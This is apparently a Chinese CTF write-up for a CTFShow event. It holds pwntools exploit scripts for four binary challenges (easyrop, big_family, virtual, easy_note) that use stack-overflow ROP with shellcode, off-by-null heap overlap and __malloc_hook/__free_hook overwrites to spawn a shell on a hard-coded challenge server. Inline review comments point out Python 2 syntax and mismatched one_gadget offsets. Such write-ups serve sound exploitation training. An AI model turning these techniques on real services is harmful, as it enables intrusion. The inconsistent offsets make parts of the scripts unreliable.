签到
bilibili搜索CTFShow,直播👀flag
问卷调查
填好即可拿到
easyrop
简单栈溢出，将返回地址写成ROP，然后在data段布置shellcode跳过去执行即可。我写了2段，估计有大师傅分分钟秒解开。
from pwn import *
# Driver for the "easyrop" challenge, reproduced from the writeup.
# NOTE(review): 'a'*offset + p64(...) concatenates str with the bytes
# returned by p64, so this was written for Python 2 pwntools; under
# Python 3 the payload line raises TypeError.
context.terminal=['tmux','splitw','-h']
#p=process("./easyrop")
p=remote("111.231.70.44",28092)   # hard-coded challenge endpoint from the writeup
offset=64                          # filler bytes sent before the address chain
context.arch='amd64'
sl=asm(shellcraft.sh())            # pwntools-assembled shell shellcode for amd64
shellcode='''
pop rax
pop rsi
syscall
ret
'''
# Filler followed by the fixed-address chain the writeup uses; every
# constant here is specific to this binary's layout.
payload='a'*offset+p64(0x0004000B9)+p64(0x0000006000E0)+p64(0)+p64(0x6000E0+0x60)+p64(0x06000E0+0x60)
p.sendafter("easyrop",payload)
# The fixed sleeps are timing-based synchronisation with the remote
# service; they are fragile under latency and are the first thing to
# adjust if the interaction desynchronises.
sleep(2)
p.send(asm(shellcode))
sleep(4)
p.send("a")
sleep(3)
p.send(sl)
p.interactive()
big_family
off by null，用malloc_consolidate构造堆块重叠，写top_chunk到malloc_hook上方即可
#coding=utf-8
from pwn import *
#p=process("./family")
p=remote("111.231.70.44",28003)   # challenge endpoint from the writeup; the local process() line above is left commented out
elf=ELF("./family")               # the challenge binary must be in the working directory
libc=elf.libc                     # libc that pwntools associates with the local binary; the offsets below assume the remote one matches
def menu(idx):
    """Pick menu entry *idx*: wait for the ":" prompt, then send it as a line."""
    choice = str(idx)
    p.sendlineafter(":", choice)
def add(size,data):
    """Menu option 1: request *size* bytes and write *data* into the new entry.

    *size* is answered as a line after the "?" prompt; *data* is sent raw
    after the following "?" prompt, so callers append "\\n" themselves.
    """
    menu(1)
    size_text = str(size)
    p.sendlineafter("?", size_text)
    p.sendafter("?", data)
def delete(idx):
    """Menu option 2: free entry *idx* (index sent as a line after the "?" prompt)."""
    menu(2)
    index_text = str(idx)
    p.sendlineafter("?", index_text)
def show(idx):
    """Menu option 3: print entry *idx* (index sent as a line after the "?" prompt)."""
    menu(3)
    index_text = str(idx)
    p.sendlineafter("?", index_text)
context.terminal=['tmux','splitw','-h']
# Interaction sequence reproduced from the writeup. Sizes, indices and
# hex offsets below are specific to this challenge binary and its libc;
# only libcbase and heap are recovered at runtime from service output.
add(0x18,"AAA\n")
for i in range(13):
    add(0x38,"A"*8+str(i)+"\n")
#add(0x10,")
add(0x18,p64(0)+p64(0x41)+"\n")
add(0x40,"\x00"*0x28+p64(0x21)+"\n")
delete(0)
delete(4)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
menu('1'*0x500)   # 0x500-byte menu answer; the writeup does not say why it is needed
add(0x38, "B"*0x30+p64(0x120))
add(0x38, "C"*0x30+p32(0x40)+"\n")
add(0x38, "p"*0x30+"\n")
delete(4)
menu('1'*0x500)
delete(10)
menu("1"*0x500)
add(0x38,"a\n")
add(0x38,"a\n")
add(0x38,"a\n")
show(5)
# Leak parsing: read through the first 0x7f byte, unpack the last 6 bytes
# (zero-padded to 8) with u64, then subtract fixed adjustments. "-0x10-88"
# is hard-coded for the writeup's libc build; verify if the remote differs.
libcbase=u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")-libc.sym['__malloc_hook']-0x10-88
log.success("libcbase: "+hex(libcbase))
add(0x38, "GGG\n")#8=5
delete(0)
delete(8)
show(5)
p.recvuntil("\n")
heap=u64(p.recv(6)+"\x00\x00")-0xe0   # second leak: 6 raw bytes, fixed -0xe0 adjustment
log.success("heap: "+hex(heap))
#delete(5)
add(0x38, "dd\n")#
add(0x38, "dd\n")#0
delete(0)
delete(8)
delete(5)
delete(15)
# NOTE(review): hard-coded __malloc_hook offset, while the add() call a few
# lines below uses libc.sym['__malloc_hook'] for the same symbol; keeping
# one source of truth (the symbol lookup) avoids the two drifting apart.
malloc_hook=libcbase+0x3c4b10
add(0x38,p64(heap+0x370)+"\n")
add(0x38, "dd\n")
add(0x38, "dd\n")
#delete(0)
delete(14)
add(0x38, p64(0)+p64(0x51)+p64(libcbase+libc.sym['__malloc_hook']+0x10+5)+"\n")
add(0x40, "aa\n")
#delete(0)
add(0x40, '\xaa'*3+p64(0x51)+p64(malloc_hook+0x10+0x10)+"\n")
add(0x47, "\x00"*0x38+p64(malloc_hook-0x18)+"\n")
one=libcbase+0x4527a   # offset from the one_gadget listing quoted below; only referenced by the commented-out line
#delete(8)
#add(0x40,p64(0)+p64(one)+"\n")
for i in range(4):
    delete(i)
for i in range(6,10):
    delete(i)
add(0x47,"dd\n")
add(0x47,"dd\n")
add(0x47,"dd\n")
realloc=libcbase+0x846c0#libc.sym['__libc_realloc']
# NOTE(review): the constant below is 0x4526a, 0x10 less than the 0x4527a
# stored in `one`; this may be deliberate, but it is not explained in the
# writeup and `one` itself is never used.
add(0x47,p64(libcbase+0x4526a)+p64(realloc+16)+"\n")
#delete(11)
#delete(5)
#show(8)
#delete()
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
'''
'''
p.interactive()
virtual
这道题其实也是堆题，只要逆向一下指令就行了
from pwn import *
#p=process('./baby_vm')
p=remote("111.231.70.44",28085)   # challenge endpoint from the writeup; the local process() line above is left commented out
elf=ELF('./baby_vm')              # challenge binary, expected in the working directory
libc=ELF("./libc-2.27.so")        # the libc shipped with the challenge; symbol offsets below come from this file
def add(size):
    """Encode the VM instruction the writeup calls ``add``: opcode byte 0x06 then one size byte.

    ``size`` is converted with ``chr``; the writeup only passes values below 0x100.
    """
    opcode = '\x06'
    operand = chr(size)
    return opcode + operand
def nop():
    """Encode the instruction the writeup calls ``nop``: the single opcode byte 0x02."""
    opcode = '\x02'
    return opcode
def push(content):
    """Encode ``push``: bytes 0x00 0x40 followed by ``content`` packed with p64."""
    header = '\x00\x40'
    operand = p64(content)
    return header + operand
def pop():
    """Encode ``pop``: opcode byte 0x01 followed by the operand byte 0x40."""
    encoded = '\x01\x40'
    return encoded
def edit():
    """Encode ``edit``: opcode byte 0x05 with sub-operation byte 0x01."""
    encoded = '\x05\x01'
    return encoded
def show():
    """Encode ``show``: opcode byte 0x05 with sub-operation byte 0x02."""
    encoded = '\x05\x02'
    return encoded
def free():
    """Encode ``free``: the single opcode byte 0x07."""
    opcode = '\x07'
    return opcode
def ret():
    """Encode ``ret``: the single opcode byte 0x08."""
    opcode = '\x08'
    return opcode
#pause()
# First instruction stream for the challenge VM, built from the encoder
# helpers above and sent in one piece after the ':' prompt. All sizes are
# the writeup's.
payload=add(0xf0)+free()+add(0xe0)+free()+add(0xd0)+free()+add(0xc0)+free()+add(0xb0)+free()+add(0xa0)+free()+add(0x90)+free()+add(0xf0)+pop()+push(0x461)+free()+add(0x20)+show()+free()+ret()
p.sendafter(':',payload)
# Leak parsing: read through the first 0x7f byte, unpack the last 6 bytes
# (zero-padded to 8) with u64; "-0x10-96-0x400" is hard-coded for the
# libc-2.27.so loaded above.
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-0x10-96-0x400
log.success('libcbase: '+hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
pause()   # interactive pwntools pause; remove for unattended runs
# Second instruction stream, sent after the next ':' prompt.
payload=add(0x40)+free()+add(0x60)+free()+add(0x70)+push(0)+push(0xe1)+push(free_hook)+free()+add(0xe0)+pop()+push(0x31)+free()+add(0xe1)+push(system)+free()+add(0x50)+edit()+free()
p.sendafter(':',payload)
#p.recv
#p.sendafter(':',payload)
#pause()
#push(0x123)
p.interactive()
easy_note
在编辑的地方可以把size改大，然后泄露随机数和libc；之后有一个任意地址写，写__free_hook即可
from pwn import *
#p=process("./daji2")
p=remote("111.231.70.44",28146)   # challenge endpoint from the writeup; the local process() line above is left commented out
elf=ELF("./daji2")                # challenge binary, expected in the working directory
libc=ELF("./libc-2.27.so")        # the libc shipped with the challenge; symbol offsets below come from this file
context.terminal=['tmux',"splitw","-h"]
def menu(idx):
    """Pick menu entry *idx*: wait for the ">" prompt, then send it as a line."""
    choice = str(idx)
    p.sendlineafter(">", choice)
def add(size):
    """Menu option 1: request a new entry of *size* bytes (size sent after the ":" prompt)."""
    menu(1)
    size_text = str(size)
    p.sendlineafter(":", size_text)
def show(idx):
    """Menu option 2: print entry *idx* (index sent after the ":" prompt)."""
    menu(2)
    index_text = str(idx)
    p.sendlineafter(":", index_text)
def edit(idx,size,data):
    """Menu option 3: select entry *idx*, answer *size*, then send *data* raw.

    The fixed 4-second sleep before the final send is timing-based
    synchronisation with the remote service, kept exactly as in the writeup.
    """
    menu(3)
    for answer in (str(idx), str(size)):
        p.sendlineafter(":", answer)
    sleep(4)
    p.send(data)
# Interaction sequence reproduced from the writeup; sizes and offsets are
# specific to this binary and the libc-2.27.so loaded above.
add(0x18)
add(0x68)
edit(0,0x20,"a"*0x18+p64(0x100))#+p64(100)+p64(0x4312321)+p64(0x602120))
show(0)
# Leak parsing: skip the 0x18 filler bytes plus 8 more, read the 4-byte
# value the writeup calls "magic", then a 6-byte pointer ending in 0x7f.
p.recvuntil("a"*0x18)
p.recv(8)
magic=u32(p.recv(4))
print hex(magic)   # Python 2 print statement; this script does not parse under Python 3
libcbase=u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")
libcbase1=libcbase+0x400000   # fixed 0x400000 adjustment applied to the raw leak; the writeup gives no derivation
system=libcbase+libc.sym['system']   # computed from the unadjusted base and not used below
log.success("libcbase: "+hex(libcbase))
log.success("libcbase1: "+hex(libcbase1))
# NOTE(review): the one_gadget listing quoted at the bottom shows 0x10a45c,
# not 0x10a41c; confirm which libc build this offset was taken from.
one=libcbase1+0x10a41c
free_hook=libcbase1+libc.sym['__free_hook']
log.success("libcbase: "+hex(free_hook))   # NOTE(review): the label says "libcbase" but the value logged is free_hook
#edit(0,0x100,"a"*0x18+p64(0x100)+p64(magic)+"doudou")
# The next five lines are edit(0, 0x80, ...) written out inline.
menu(3)
p.sendlineafter(":",str(0))
p.sendlineafter(":",str(0x80))
sleep(4)
p.send("a"*0x18+p64(0x100)+p64(magic)+p64(free_hook))
# And these five are edit(0, 0x10, p64(one)) written out inline.
menu(3)
p.sendlineafter(":",str(0))
p.sendlineafter(":",str(0x10))
sleep(4)
p.send(p64(one))
'''
0x4f365 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f3c2 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a45c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
p.interactive()